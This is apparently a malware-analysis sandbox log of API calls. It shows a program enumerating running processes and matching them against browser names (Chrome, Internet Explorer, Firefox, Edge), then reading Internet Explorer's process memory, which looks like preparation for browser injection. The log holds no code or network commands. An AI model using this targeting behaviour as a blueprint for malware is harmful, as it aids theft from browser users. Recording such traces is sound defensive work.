	[0256.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0256.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xb328
	[0256.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.538] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0256.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.538] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.539] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0256.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.539] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0256.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xb32c
	[0256.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.540] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0256.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.541] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.541] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0256.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.542] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.542] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0256.543] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xb330
	[0256.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.543] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0256.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.544] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.544] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0256.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.544] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.544] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0256.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xb334
	[0256.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.545] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0256.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.546] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.546] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0256.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.546] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0256.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xb338
	[0256.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.547] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0256.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.548] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.548] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0256.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.549] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.549] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0256.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xb33c
	[0256.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.550] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0256.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.550] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.551] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0256.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.552] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0256.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xb340
	[0256.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.553] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0256.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.554] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.554] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0256.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.555] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0256.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xb344
	[0256.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.556] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0256.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.557] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.557] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0256.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.560] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.561] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0256.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xb348
	[0256.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.562] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0256.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.562] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.563] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0256.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.563] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.563] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xb34c
	[0256.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.565] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.565] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.565] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.565] NtQueryInformationProcess (in: ProcessHandle=0xb34c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.566] ReadProcessMemory (in: hProcess=0xb34c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.566] ReadProcessMemory (in: hProcess=0xb34c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.566] ReadProcessMemory (in: hProcess=0xb34c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.566] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0256.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xb350
	[0256.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.567] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0256.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.567] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0256.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.567] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0256.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.568] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.568] NtQueryInformationProcess (in: ProcessHandle=0xb350, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0256.568] ReadProcessMemory (in: hProcess=0xb350, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0256.568] ReadProcessMemory (in: hProcess=0xb350, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0256.568] ReadProcessMemory (in: hProcess=0xb350, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0256.568] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0256.569] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xb354
	[0256.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.569] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.570] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.570] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.570] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.571] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0256.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xb358
	[0256.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.571] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0256.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.572] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.572] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0256.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.572] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.573] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xb35c
	[0256.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.574] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.574] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.574] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.575] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.575] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xb360
	[0256.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.577] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.577] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.577] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.578] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.578] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.578] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xb364
	[0256.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.579] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.579] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.579] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.580] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.580] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xb368
	[0256.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.581] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.581] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.581] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.582] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xb36c
	[0256.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.583] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.583] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.583] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.584] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.584] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xb370
	[0256.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.585] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.585] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.586] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.586] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.586] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.587] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xb374
	[0256.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.587] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.587] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.588] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.588] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.588] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0256.589] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xb378
	[0256.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.589] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0256.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.590] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.590] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0256.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.590] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.590] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0256.591] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xb37c
	[0256.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.591] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.592] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.592] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.592] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.593] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0256.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xb380
	[0256.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.594] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
